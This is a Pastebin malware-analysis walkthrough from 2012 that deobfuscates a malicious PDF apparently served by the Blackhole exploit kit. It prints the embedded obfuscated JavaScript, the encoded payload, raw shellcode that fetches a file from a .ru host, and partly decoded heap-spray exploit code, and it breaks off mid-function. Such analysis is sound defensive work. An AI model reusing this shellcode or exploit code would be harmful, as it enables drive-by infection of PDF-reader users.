API tools faq
paste
Advertisement
MalwareMustDie

Guide Step by Step of Analysis Malicious PDF: infector2.pdf

MalwareMustDie
Nov 26th, 2012
2,229
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 36.12 KB | None | 0 0
raw download clone embed print report
  1. //=========================================
  2. // #MalwareMustDie | @unixfreaxjp ~]$ date
  3. // Mon Nov 26 16:35:46 JST 2012
  4. //
  5. // Guide Step by Step of Analysis Malicious PDF : infector2.pdf
  6. // With the decoding guide step by step
  7. // As per found in Case: http://malwaremustdie.blogspot.jp/2012/11/plugindetect-079-payloads-of-blackhole.html
  8. // Target is uploaded in VT at: https://www.virustotal.com/file/f3880c001bf094902f8a0a76e55cacd18555fe593dbe463f4aca9b4ad7050310/analysis/
  9. // *) the materials contains dangerous code, yet we hexed it, so it cannot be used as per it is.
  10. //=========================================
  11.  
  12. ================================
  13.  
  14. CONFIRMING THE OBJECT
  15. ; Make sure we can spot the suspicious
  16. ; object like JS or JavaScript..
  17.  
  18. =================================
  19.  
  20. // I always confirm it with the below
  21.  
  22. PDFiD 0.0.11 ./infector2.pdf
  23.  PDF Header: %PDF-1.6
  24.  obj                   27
  25.  endobj                27
  26.  stream                13
  27.  endstream             12
  28.  xref                   2
  29.  trailer                2
  30.  startxref              0
  31.  /Page                  2
  32.  /Encrypt               0
  33.  /ObjStm                0  // suspect the below...
  34.  /JS                    0  // <======== There...
  35.  /JavaScript            0  // <=========== there....
  36.  /AA                    0
  37.  /OpenAction            0
  38.  /AcroForm              1
  39.  /JBIG2Decode           0
  40.  /RichMedia             0
  41.  /Launch                0
  42.  /Colors > 2^24         0
  43.  %%EOF                  1
  44.  After last %%EOF       0
  45.  Total entropy:           6.410619 (     14769 bytes)
  46.  Entropy inside streams:  7.874169 (      3783 bytes)
  47.  Entropy outside streams: 5.203651 (     10986 bytes)
  48.  
  49. 0000   25 50 44 46 2D 31 2E 36 0D 25 E2 E3 CF D3 0D 0A    %PDF-1.6.%......
  50. 0010   35 32 20 30 20 6F 62 6A 3C 3C 2F 4C 65 6E 67 74    52 0 obj<</Lengt
  51. 0020   68 20 36 36 33 32 32 2F 52 6F 6F 74 20 31 20 30    h 66322/Root 1 0
  52. 0030   20 52 2F 49 6E 66 6F 20 33 20 30 20 52 25 2F 46     R/Info 3 0 R%/F
  53. 0040   69 6C 74 65 72 2F 46 6C 61 74 65 44 65 63 6F 64    ilter/FlateDecod
  54. 0050   65 2F 57 5B 31 20 32 20 31 5D 2F 49 6E 64 65 78    e/W[1 2 1]/Index
  55. 0060   5B 35 20 31 20 37 20 31 20 39 20 34 20 32 33 20    [5 1 7 1 9 4 23
  56. 0070   34 20 35 30 20 33 5D 3E 3E 73 74 72 65 61 6D 0D    4 50 3]>>stream.
  57. 0080   2F 46 69 6C 74 65 72 2F 46 6C 61 74 65 44 65 63    /Filter/FlateDec
  58. 0090   6F 64 65 2F 57 5B 31 20 32 20 31 5D 2F 49 6E 64    ode/W[1 2 1]/Ind
  59. 00A0   65 78 5B 35 20 31 20 37 20 31 20 39 20 34 20 32    ex[5 1 7 1 9 4 2
  60. 00B0   33 20 34 20 35 30 20 33 5D 3E 3E 73 74 72 65 61    3 4 50 3]>>strea
  61. 00C0   6D 0D 78 DA 62 62 62 30 62 60 62 60 60 60 C4 47    m.x.bbb0b`b```.G
  62. 00D0   30 FE 02 12 FF D9 21 AC FF 0C 77 FF 33 31 30 5A    0.....!...w.310Z
  63. 00E0   83 B4 F5 32 00 04 18 00 77 1F 06 F5 0D 0A 65 6E    ...2....w.....en
  64. 00F0   64 73 74 72 65 61 6D 0D 65 6E 64 6F 62 6A 0D 31    dstream.endobj.1
  65. 0100   20 30 20 6F 62 6A 3C 3C 2F 4D 61 72 6B 49 6E 66     0 obj<</MarkInf
  66.  :                             :                                 :
  67.  
  68. ================================
  69.  
  70. DETECTING JAVASCRIPT
  71.  
  72. ; Check JS's Location first
  73. ; Note: there is a possibilty of
  74. ; a scattered script, so read it well..
  75. ; My recommendation is see the all strings or
  76. ; use the hex editor to understand the address
  77. ; of the script.
  78.  
  79. ================================
  80.  
  81. // in the address 0x2EBC-0x32E5 there is a JS code
  82.  
  83. <xfa:script contentType='&#000000097;pplication/x-javascript'>
  84. /*
  85.  
  86. */
  87. with(event){
  88. l="l";
  89. ev=/*ewbwf*/"eva"/*/renyaerz*/;
  90. t=target;
  91. aa=/*/gbergern*/'co'+'de]';
  92. ind="indexOf";
  93. if(app.setProfile)if((app.setProfile+/**/"asvfa")[ind](aa)!=-1){k=t[/*czx*/ev/*qwdsa*/+l/*sgewgerj*/];}
  94. a=/**/t.creationDate.split('|')[0].substr(13);
  95. }
  96. s="";
  97. p=k("pars"+"eInt");
  98. z=a;
  99. e="de";
  100. ll="length";
  101. ss=/*bgre*/k("String");
  102. ff="from";
  103. ff+="Ch";
  104. ff+="arCo";
  105. ss=ss[ff/*x*/+e];
  106. xz=a.length;
  107. for(i=0;i&lt;xz;i+=2){
  108.     if (z[i]=='-')continue;
  109.     s=s+(ss(p(z[i]+z[i+1],0x1a)));
  110. }
  111. zx=k;
  112. zx(s);
  113. </xfa:script>
  114.  
  115. =================================
  116.  
  117. DECODING PREPARATION
  118.  
  119. =================================
  120.  
  121. // Like previously decoded, strip the PDF tags and..
  122. // this is the generator code used for deobfuscating the obfs'ed data
  123. // this script tried to fool Virus scanning by writing many /* comment */ in there...
  124. // so just re-write it and make it nice like this below:
  125.  
  126.  with(event)
  127.  {
  128.    l="l";
  129.    ev="eva";
  130.    t=target;
  131.    aa='co'+'de]';
  132.    ind="indexOf";
  133.    if(app.setProfile)if((app.setProfile+"asvfa")[ind](aa)!=-1)
  134.    {
  135.      k=t[ev+l];
  136.    }
  137.    a=t.creationDate.split('|')[0].substr(13);
  138.  }
  139.  s="";
  140.  p=k("pars"+"eInt");
  141.  z=a;
  142.  e="de";
  143.  ll="length";
  144.  ss=k("String");
  145.  ff="from";
  146.  ff+="Ch";
  147.  ff+="arCo";
  148.  ss=ss[ff+e];
  149.  xz=a.length;
  150.  for(i=0;i&lt;xz;i+=2)
  151.  {
  152.    if (z[i]=='-')continue;
  153.    s=s+(ss(p(z[i]+z[i+1],0x1a)));
  154.  }
  155.  zx=k;
  156.  zx(s);
  157.  
  158.  
  159. ===============================
  160.  
  161. FIND THE OBFUSCATION DATA
  162. ; again... it maybe scattered,
  163. ; pls be sure/careful
  164.  
  165. =================================
  166.  
  167. // it called to the data in tags t.creationDate, so let's grep the strings :-)
  168. // then we found the data in address 0x1A1C as per below:
  169.  
  170. <<
  171.     /Title(asdasdsad)/CreationDate(%#^&*%^#@&%#@3J-148481K3J-8443N4A4C-8293N4E3N-4464C1K4C-03J4A3P3N-44C1K3L4A-83N3J4C41-847462G3J-84C3N1K4B-6484414C-81E1D4K1D-91F3D1N3F-41K4A3N48-2443J3L3N-91E1L271L-33P1I1D1D-31F274E3J-04A16483J-53M3M4146-13P274E3J-64A163K3K-03K1I163L-43L3L1I16-43M3M3M1I-7163N3N3N-91I163O3O-53O1I163P-53P3P1I16-640404027-14E3J4A16-248474146-84C3N4A4B-93H3J1I16-041274E3J-44A164G16-22916463N-74F162D4A-24A3J4H1E-21F274E3J-54A164H16-02916463N-04F162D4A-64A3J4H1E-51F274E3J-34A163H44-71N291820-03L1O1M22-81M1M3O1M-7211N2324-61M203J1P-93L1O1M22-61M1M3O1M-63O221P24-51M203J3J-01P3N3K24-51M203J1P-51M1O1M24-51O203J22-23N1O3O24-11M203J20-81N201N20-41N201N1O-1221M1M1M-91M1M1M1M-71M1M1M1M-81M1M1M1M-31M1M1M1M-61M1M1M1M-01M1M1M1M-61M1M1M1N-31O1P2524-31M203J22-6201O1M22-91M1M3O1M-81M1M201M-11M1M1M20-61N201N20-81N201N20-01N201N20-61N201N18-61H3N4E3N-1464C1K4C-23J4A3P3N-54C1K3L4A-93N3J4C41-247462G3J-24C3N1K4B-44844414C-91E1D4K1D-51F3D1N3F-71K4A3N48-9443J3L3N-11E1L271L-13P1I1D1D-81F274E3J-84A163H44-91O291820-23L1O1M22-61M1M3O3J-121221P24-81M203J1P-93L1O1M22-41M1M3O25-6221O1N24-01M203J25-41M1N3O24-81M203J1P-71M251M24-520203J23-03M233N24-51M203J20-31N201N20-11N201N1O-9221M1M1M-81M1M1M1M-01M1M1M1M-31M1M1M1M-11M1M1M1M-61M1M1M1M-41M1M1M1M-81M1M1M23-41N242424-31M203J22-9201O1M22-71M1M3O1M-31M1M201M-01M1M1M20-61N201N20-51N201N20-61N201N20-91N201N18-51H3N4E3N-6464C1K4C-63J4A3P3N-24C1K3L4A-63N3J4C41-047462G3J-24C3N1K4B-54844414C-71E1D4K1D-21F3D1N3F-21K4A3N48-1443J3L3N-31E1L271L-13P1I1D1D-11F273H44-61P293J48-648273H44-42029463N-24F162D4A-04A3J4H1E-21F273O4D-8463L4C41-34746163H-444211E1F-54J4E3J4A-9163H4422-4293H441P-31K4E413N-64F3N4A38-23N4A4B41-347461K4C-247354C4A-041463P1E-91F273H44-622293H44-9221K4A3N-148443J3L-03N1E1D1K-41D1I1D1D-11F274F40-241443N1E-93H44221K-2443N463P-74C402820-21F3H4422-31H291D1M-51D274A3N-94C4D4A46-016483J4A-84B3N2L46-94C1E3H44-2221I1N1M-81F4L3O4D-5463L4C41-84746163H-644231E3H-444241I3H-244251F4J-94F404144-03N1E3H44-5241K443N-4463P4C40-41G1O283H-744251F3H-544241H29-23H442427-64A3N4C4D-94A46163H-244241K4B-34D3K4B4C-04A41463P-41E1M1I3H-244251L1O-41F4L3O4D-4463L4C41-44746163H-92L1M1E3H-92L1N1F4J-33H2L1N29-94D463N4B-93L3J483N-51E3H2L1N-41F274A47-04C3N2G3J-243293H2L-21N1K443N-6463P4C40-81G1O273M-73J433447-74C3N294D-8463N4B3L-43J483N1E-41D1B4D25-51M251M1D-11F274B48-14A3J4H29-73H44231E-83M3J4334-0474C3N1I-01M4G1O1M-11M1M1J4A-0474C3N2G-63J431F27-344474G39-4403N3N29-23H2L1N1H-94B484A3J-44H274447-44G39403N-53N293H44-5231E4447-34G39403N-03N1I211O-9201M2524-31F273O47-44A1E4129-21M271641-116281620-21M1M2716-9411H1H1F-93H44203D-2413F2944-3474G3940-53N3N1K4B-74D3K4B4C-64A1E1M1I-644474G39-5403N3N1K-4443N463P-74C401J1N-71F1H3M3J-54334474C-93N274L3O-54D463L4C-041474616-43H2L1O1E-83H2L1N1I-0443N461F-04J4F4041-2443N1E3H-52L1N1K44-53N463P4C-74028443N-7461F3H2L-71N1H293H-32L1N274A-13N4C4D4A-946163H2L-41N1K4B4D-53K4B4C4A-041463P1E-51M1I443N-7461F4L3O-54D463L4C-041474616-53H2L1P1E-13H2L1N1F-74J4A3N4C-2291D1D27-63O474A1E-441291M27-141283H2L-31N1K443N-3463P4C40-627411H29-41O1F4J3K-9293H2L1N-41K4B4D3K-44B4C4A1E-1411I1O1F-8273L2948-13J4A4B3N-92L464C1E-63K1I1N22-01F274A3N-64C1H2935-94C4A4146-33P1K3O4A-547452F40-53J4A2F47-83M3N1E3L-71F274L4A-13N4C4D4A-546164A3N-24C4L3O4D-1463L4C41-24746163H-542411N1E-03H2L1N1I-63H2L201F-34J3H2L21-4291D1D27-73O474A1E-73H2L2229-01M273H2L-422283H2L-11N1K443N-1463P4C40-0273H2L22-71H1H1F4J-53H442529-93H2L201K-0443N463P-44C40273H-72L23293H-02L1N1K3L-0403J4A2F-8473M3N2D-34C1E3H2L-7221F273H-32L24293H-32L201K3L-4403J4A2F-4473M3N2D-84C1E3H2L-8221B3H44-8251F273H-32L211H29-5354C4A41-8463P1K3O-94A47452F-9403J4A2F-5473M3N1E-73H2L233G-63H2L241F-5274L4A3N-34C4D4A46-9163H2L21-84L3O4D46-53L4C4147-846163H2L-3251E3H2L-6221F4J3H-0421M293H-72L221K4C-347354C4A-041463P1E-91N221F27-33H421N29-53H421M1K-6443N463P-74C40273H-82L21291E-23H421N1B-31O1F2B1D-81M1D1H3H-0421M263H-1421M274A-13N4C4D4A-646163H2L-2214L3O4D-3463L4C41-74746163H-7421O1E3H-22L1N1F4J-33H2L2129-41D1D273O-5474A1E3H-42L22291M-2273H2L22-2283H2L1N-41K443N46-83P4C4027-93H2L221H-4291O1F4J-73H2L211H-4291D1B4D-61D273H2L-7211H293H-82L251E3H-32L1N1K3L-5403J4A2F-5473M3N2D-34C1E3H2L-8221H1N1F-81F273H2L-1211H293H-82L251E3H-22L1N1K3L-5403J4A2F-6473M3N2D-44C1E3H2L-8221F1F4L-34A3N4C4D-34A46163H-02L214L3O-84D463L4C-741474616-73H421P1E-41F4J3H42-120293H44-9211E1F27-8413O1E3H-142202825-81M1M1M1F-44J3H4221-9291D471H-34D2D3542-03P3P3P43-6484D2O20-12E2N1L1L-31L1L1L4F-12D2D2D2D-82E2D2D2D-62D2D2D2D-12D2D2D2D-82D332D2D-02D2D2D2D-22D2D3O40-03J2D3541-72D3P3B2D-825242H2L-62E2N1D27-53H422229-43H441N27-93H422329-73H2L1P1E-43H42221F-64L3N444B-43N4J3H42-121291D43-02E1H2D35-542413340-92H48253O-1472E2N1L-41L1L1L1L-44F2D2D2D-02D2E2D2D-92D2D2D2D-62D2D2D2D-82D2D332D-22D2D2D2D-22D2D2D3B-24G2F2D35-2412D3P3B-02D1L3O2H-3202E2N1D-0273H4222-2293H441O-5273H4223-1293H2L1P-91E3H4222-61F4L3H42-724291D35-43743492D-22G3P3P2D-92D2E2E1D-1273H4225-8293H2L1O-51E1D3337-72I2E1D1I-91N1M2524-7201F273H-344441M29-11D33333L-92D2D2D2H-92G2D2D2H-72D2D2D2D-14F2L2D2D-02D2D332H-32G2D2D2H-02D2D2D2D-42E2D2D2D-72D2D4F2H-42G2D2D2H-62D2D2D2D-82E2D2D2D-92D2E3P2H-62G2D2D2H-02D2D2D2D-72E2D2D2D-92D2H332H-02H2D2D2H-52D2D2D2D-92L2D2D2D-62D2I4F2H-92H2D2D2H-82D2D2D2D-04F2L2D2D-72D372D2H-32G2D2P4F-72D2D2D2F-9352L2D2D-32D2D2D2D-22D2D2D2D-02P2G2D42-21L1L1L1L-31L1D273H-744441N29-33H42241H-33H42251H-23H44441M-51H3H4221-7273H4444-01O293H42-1411N1E3H-342231I1D-81D1F2741-13O1E3H44-2441O1K44-03N463P4C-8401B1O1F-13H44441O-21H294D46-33N4B3L3J-0483N1E1D-91B1M1M1D-21F273H44-8441P293H-9421O1E3H-144441O1F-4274F414C-8401E4J43-0263H4444-71P4L1F3H-32L1M1E43-01F272L45-13J3P3N2I-6413N443M-91N1K4A3J-44F383J44-24D3N293H-244441N4L-23H421P1E-91F27|6683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f64656c656d6961746f722e72753a383038302f666f72756d2f6c696e6b732f636f6c756d6e2e7068703f6b73636e68637a3d33303a316e3a31693a31693a3333266973716a743d32763a316b3a316d3a33323a33333a316b3a316b3a33313a316a3a316f26686d786f77783d3169266467616d777278783d6c7466766d267869647570793d6a6a6e71686c0000)
  172. >>
  173.  
  174. ====================================
  175.  
  176. ANALYZING THE PATTERN OF THE
  177. OBFUSCATION DATA
  178.  
  179. ; in obfs JS infector it has to be -
  180. ; a generator, or shellcode, or
  181. ; maybe an exploit strings...
  182. ; the amount of chars used and its
  183. ; origin data will make easy to know the pattern & help us to
  184. ; analyze further
  185.  
  186. =====================================
  187.  
  188. // Again, see the data pattern first it has two pattern of below,
  189. // a long one, indicating me an obfuscated code.
  190.  
  191. 148481K3J-8443N4A4C-8293N4E3N-4464C1K4C
  192. 33P1I1D1D-31F274E3J-04A16483J-53M3M4146
  193. 248474146-84C3N4A4B-93H3J1I16-041274E3J
  194. 71N291820-03L1O1M22-81M1M3O1M-7211N2324
  195. 81N201N20-41N201N1O-1221M1M1M-91M1M1M1M
  196. 11M1M1M20-61N201N20-81N201N20-01N201N20
  197. 71K4A3N48-9443J3L3N-11E1L271L-13P1I1D1D
  198.  
  199. // and this , by experience it's indicating me a shellcode...
  200.  
  201. 683e4fcfc85e47534e95f33c0648b40308b40
  202. b762003f533c94941fcad03c533db0fbe1038
  203. 396ebf38b68088bf76a0559e898ffffffe2f9
  204. 281ec040100008d5c240cc7042472656773c7
  205. 41d0441516a006a0053576a00ff561485c075
  206.  
  207. // Then see the code here:
  208. //
  209. //    a=t.creationDate.split('|')[0].substr(13);
  210. //
  211. // So let's reverse it, go from behind,
  212. // substr(13) = just erase the first 13 chars,
  213. // a=t.creationDate.split('|') = making array of var a which separation data splitted by "|"
  214. // So the "a" value is becoming like the two group of data below:
  215.  
  216.  
  217. 3J-148481K3J-8443N4A4C-8293N4E3N-4464C1K4C-03J4A3P3N-44C1K3L4A-83N3J4C41-847462G3J-84C3N1K4B-64844414C-81E1D4K1D-91F3D1N3F-41K4A3N48-2443J3L3N-91E1L271L-33P1I1D1D-31F274E3J-04A16483J-53M3M4146-13P274E3J-64A163K3K-03K1I163L-43L3L1I16-43M3M3M1I-7163N3N3N-91I163O3O-53O1I163P-53P3P1I16-640404027-14E3J4A16-248474146-84C3N4A4B-93H3J1I16-041274E3J-44A164G16-22916463N-74F162D4A-24A3J4H1E-21F274E3J-54A164H16-02916463N-04F162D4A-64A3J4H1E-51F274E3J-34A163H44-71N291820-03L1O1M22-81M1M3O1M-7211N2324-61M203J1P-93L1O1M22-61M1M3O1M-63O221P24-51M203J3J-01P3N3K24-51M203J1P-51M1O1M24-51O203J22-23N1O3O24-11M203J20-81N201N20-41N201N1O-1221M1M1M-91M1M1M1M-71M1M1M1M-81M1M1M1M-31M1M1M1M-61M1M1M1M-01M1M1M1M-61M1M1M1N-31O1P2524-31M203J22-6201O1M22-91M1M3O1M-81M1M201M-11M1M1M20-61N201N20-81N201N20-01N201N20-61N201N18-61H3N4E3N-1464C1K4C-23J4A3P3N-54C1K3L4A-93N3J4C41-247462G3J-24C3N1K4B-44844414C-91E1D4K1D-51F3D1N3F-71K4A3N48-9443J3L3N-11E1L271L-13P1I1D1D-81F274E3J-84A163H44-91O291820-23L1O1M22-61M1M3O3J-121221P24-81M203J1P-93L1O1M22-41M1M3O25-6221O1N24-01M203J25-41M1N3O24-81M203J1P-71M251M24-520203J23-03M233N24-51M203J20-31N201N20-11N201N1O-9221M1M1M-81M1M1M1M-01M1M1M1M-31M1M1M1M-11M1M1M1M-61M1M1M1M-41M1M1M1M-81M1M1M23-41N242424-31M203J22-9201O1M22-71M1M3O1M-31M1M201M-01M1M1M20-61N201N20-51N201N20-61N201N20-91N201N18-51H3N4E3N-6464C1K4C-63J4A3P3N-24C1K3L4A-63N3J4C41-047462G3J-24C3N1K4B-54844414C-71E1D4K1D-21F3D1N3F-21K4A3N48-1443J3L3N-31E1L271L-13P1I1D1D-11F273H44-61P293J48-648273H44-42029463N-24F162D4A-04A3J4H1E-21F273O4D-8463L4C41-34746163H-444211E1F-54J4E3J4A-9163H4422-4293H441P-31K4E413N-64F3N4A38-23N4A4B41-347461K4C-247354C4A-041463P1E-91F273H44-622293H44-9221K4A3N-148443J3L-03N1E1D1K-41D1I1D1D-11F274F40-241443N1E-93H44221K-2443N463P-74C402820-21F3H4422-31H291D1M-51D274A3N-94C4D4A46-016483J4A-84B3N2L46-94C1E3H44-2221I1N1M-81F4L3O4D-5463L4C41-84746163H-644231E3H-444241I3H-244251F4J-94F404144-03N1E3H44-5241K443N-4463P4C40-41G1O283H-744251F3H-544241H29-23H442427-64A3N4C4D-94A46163H-244241K4B-34D3K4B4C-04A41463P-41E1M1I3H-244251L1O-41F4L3O4D-4463L4C41-44746163H-92L1M1E3H-92L1N1F4J-33H2L1N29-94D463N4B-93L3J483N-51E3H2L1N-41F274A47-04C3N2G3J-243293H2L-21N1K443N-6463P4C40-81G1O273M-73J433447-74C3N294D-8463N4B3L-43J483N1E-41D1B4D25-51M251M1D-11F274B48-14A3J4H29-73H44231E-83M3J4334-0474C3N1I-01M4G1O1M-11M1M1J4A-0474C3N2G-63J431F27-344474G39-4403N3N29-23H2L1N1H-94B484A3J-44H274447-44G39403N-53N293H44-5231E4447-34G39403N-03N1I211O-9201M2524-31F273O47-44A1E4129-21M271641-116281620-21M1M2716-9411H1H1F-93H44203D-2413F2944-3474G3940-53N3N1K4B-74D3K4B4C-64A1E1M1I-644474G39-5403N3N1K-4443N463P-74C401J1N-71F1H3M3J-54334474C-93N274L3O-54D463L4C-041474616-43H2L1O1E-83H2L1N1I-0443N461F-04J4F4041-2443N1E3H-52L1N1K44-53N463P4C-74028443N-7461F3H2L-71N1H293H-32L1N274A-13N4C4D4A-946163H2L-41N1K4B4D-53K4B4C4A-041463P1E-51M1I443N-7461F4L3O-54D463L4C-041474616-53H2L1P1E-13H2L1N1F-74J4A3N4C-2291D1D27-63O474A1E-441291M27-141283H2L-31N1K443N-3463P4C40-627411H29-41O1F4J3K-9293H2L1N-41K4B4D3K-44B4C4A1E-1411I1O1F-8273L2948-13J4A4B3N-92L464C1E-63K1I1N22-01F274A3N-64C1H2935-94C4A4146-33P1K3O4A-547452F40-53J4A2F47-83M3N1E3L-71F274L4A-13N4C4D4A-546164A3N-24C4L3O4D-1463L4C41-24746163H-542411N1E-03H2L1N1I-63H2L201F-34J3H2L21-4291D1D27-73O474A1E-73H2L2229-01M273H2L-422283H2L-11N1K443N-1463P4C40-0273H2L22-71H1H1F4J-53H442529-93H2L201K-0443N463P-44C40273H-72L23293H-02L1N1K3L-0403J4A2F-8473M3N2D-34C1E3H2L-7221F273H-32L24293H-32L201K3L-4403J4A2F-4473M3N2D-84C1E3H2L-8221B3H44-8251F273H-32L211H29-5354C4A41-8463P1K3O-94A47452F-9403J4A2F-5473M3N1E-73H2L233G-63H2L241F-5274L4A3N-34C4D4A46-9163H2L21-84L3O4D46-53L4C4147-846163H2L-3251E3H2L-6221F4J3H-0421M293H-72L221K4C-347354C4A-041463P1E-91N221F27-33H421N29-53H421M1K-6443N463P-74C40273H-82L21291E-23H421N1B-31O1F2B1D-81M1D1H3H-0421M263H-1421M274A-13N4C4D4A-646163H2L-2214L3O4D-3463L4C41-74746163H-7421O1E3H-22L1N1F4J-33H2L2129-41D1D273O-5474A1E3H-42L22291M-2273H2L22-2283H2L1N-41K443N46-83P4C4027-93H2L221H-4291O1F4J-73H2L211H-4291D1B4D-61D273H2L-7211H293H-82L251E3H-32L1N1K3L-5403J4A2F-5473M3N2D-34C1E3H2L-8221H1N1F-81F273H2L-1211H293H-82L251E3H-22L1N1K3L-5403J4A2F-6473M3N2D-44C1E3H2L-8221F1F4L-34A3N4C4D-34A46163H-02L214L3O-84D463L4C-741474616-73H421P1E-41F4J3H42-120293H44-9211E1F27-8413O1E3H-142202825-81M1M1M1F-44J3H4221-9291D471H-34D2D3542-03P3P3P43-6484D2O20-12E2N1L1L-31L1L1L4F-12D2D2D2D-82E2D2D2D-62D2D2D2D-12D2D2D2D-82D332D2D-02D2D2D2D-22D2D3O40-03J2D3541-72D3P3B2D-825242H2L-62E2N1D27-53H422229-43H441N27-93H422329-73H2L1P1E-43H42221F-64L3N444B-43N4J3H42-121291D43-02E1H2D35-542413340-92H48253O-1472E2N1L-41L1L1L1L-44F2D2D2D-02D2E2D2D-92D2D2D2D-62D2D2D2D-82D2D332D-22D2D2D2D-22D2D2D3B-24G2F2D35-2412D3P3B-02D1L3O2H-3202E2N1D-0273H4222-2293H441O-5273H4223-1293H2L1P-91E3H4222-61F4L3H42-724291D35-43743492D-22G3P3P2D-92D2E2E1D-1273H4225-8293H2L1O-51E1D3337-72I2E1D1I-91N1M2524-7201F273H-344441M29-11D33333L-92D2D2D2H-92G2D2D2H-72D2D2D2D-14F2L2D2D-02D2D332H-32G2D2D2H-02D2D2D2D-42E2D2D2D-72D2D4F2H-42G2D2D2H-62D2D2D2D-82E2D2D2D-92D2E3P2H-62G2D2D2H-02D2D2D2D-72E2D2D2D-92D2H332H-02H2D2D2H-52D2D2D2D-92L2D2D2D-62D2I4F2H-92H2D2D2H-82D2D2D2D-04F2L2D2D-72D372D2H-32G2D2P4F-72D2D2D2F-9352L2D2D-32D2D2D2D-22D2D2D2D-02P2G2D42-21L1L1L1L-31L1D273H-744441N29-33H42241H-33H42251H-23H44441M-51H3H4221-7273H4444-01O293H42-1411N1E3H-342231I1D-81D1F2741-13O1E3H44-2441O1K44-03N463P4C-8401B1O1F-13H44441O-21H294D46-33N4B3L3J-0483N1E1D-91B1M1M1D-21F273H44-8441P293H-9421O1E3H-144441O1F-4274F414C-8401E4J43-0263H4444-71P4L1F3H-32L1M1E43-01F272L45-13J3P3N2I-6413N443M-91N1K4A3J-44F383J44-24D3N293H-244441N4L-23H421P1E-91F27
  218.  
  219. // and next one is....
  220.  
  221. 6683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f64656c656d6961746f722e72753a383038302f666f72756d2f6c696e6b732f636f6c756d6e2e7068703f6b73636e68637a3d33303a316e3a31693a31693a3333266973716a743d32763a316b3a316d3a33323a33333a316b3a316b3a33313a316a3a316f26686d786f77783d3169266467616d777278783d6c7466766d267869647570793d6a6a6e71686c0000
  222.  
  223. //So put the above data FIRST ARRAY ONLY into array of variable a, and runs the rest (below) of the script;
  224.  
  225.  s="";
  226.  p=k("pars"+"eInt");
  227.  z=a;
  228.  e="de";
  229.  ll="length";
  230.  ss=k("String");
  231.  ff="from";
  232.  ff+="Ch";
  233.  ff+="arCo";
  234.  ss=ss[ff+e];
  235.  xz=a.length;
  236.  for(i=0;i&lt;xz;i+=2)
  237.  {
  238.    if (z[i]=='-')continue;
  239.    s=s+(ss(p(z[i]+z[i+1],0x1a)));
  240.  }
  241.  
  242. // zx=k;  <-- we don't need these mumbo jumbo
  243. // zx(s);     instead just burp the result of s variable as per below:
  244.  
  245. eval (s);  // or you can use command of ==> document.write(a);
  246.  
  247.  
  248. // it will burp us two eval() values,
  249. // one is ..... just ignored it...
  250. // and the other value is the condensed code as per below:
  251.  
  252. app.alert=event.target.creationDate.split('|')[1].replace(/;/g,'');var padding;var bbb,ccc,ddd,eee,fff,ggg,hhh;var pointers_a,i;var x=new Array();var y=new Array();var _l1="4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141"+event.target.creationDate.split('|')[1].replace(/;/g,'');var _l2="4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f000400004141414141414141"+event.target.creationDate.split('|')[1].replace(/;/g,'');_l3=app;_l4=new Array();function _l5(){var _l6=_l3.viewerVersion.toString();_l6=_l6.replace('.','');while(_l6.length<4)_l6+='0';return parseInt(_l6,10)}function _l7(_l8,_l9){while(_l8.length*2<_l9)_l8+=_l8;return _l8.substring(0,_l9/2)}function _I0(_I1){_I1=unescape(_I1);roteDak=_I1.length*2;dakRote=unescape('%u9090');spray=_l7(dakRote,0x2000-roteDak);loxWhee=_I1+spray;loxWhee=_l7(loxWhee,524098);for(i=0;i<400;i++)_l4[i]=loxWhee.substr(0,loxWhee.length-1)+dakRote}function _I2(_I1,len){while(_I1.length<len)_I1+=_I1;return _I1.substring(0,len)}function _I3(_I1){ret='';for(i=0;i<_I1.length;i+=2){b=_I1.substr(i,2);c=parseInt(b,16);ret+=String.fromCharCode(c)}return ret}function _ji1(_I1,_I4){_I5='';for(_I6=0;_I6<_I1.length;_I6++){_l9=_I4.length;_I7=_I1.charCodeAt(_I6);_I8=_I4.charCodeAt(_I6%_l9);_I5+=String.fromCharCode(_I7^_I8)}return _I5}function _I9(_I6){_j0=_I6.toString(16);_j1=_j0.length;_I5=(_j1%2)?'0'+_j0:_j0;return _I5}function _j2(_I1){_I5='';for(_I6=0;_I6<_I1.length;_I6+=2){_I5+='%u';_I5+=_I9(_I1.charCodeAt(_I6+1));_I5+=_I9(_I1.charCodeAt(_I6))}return _I5}function 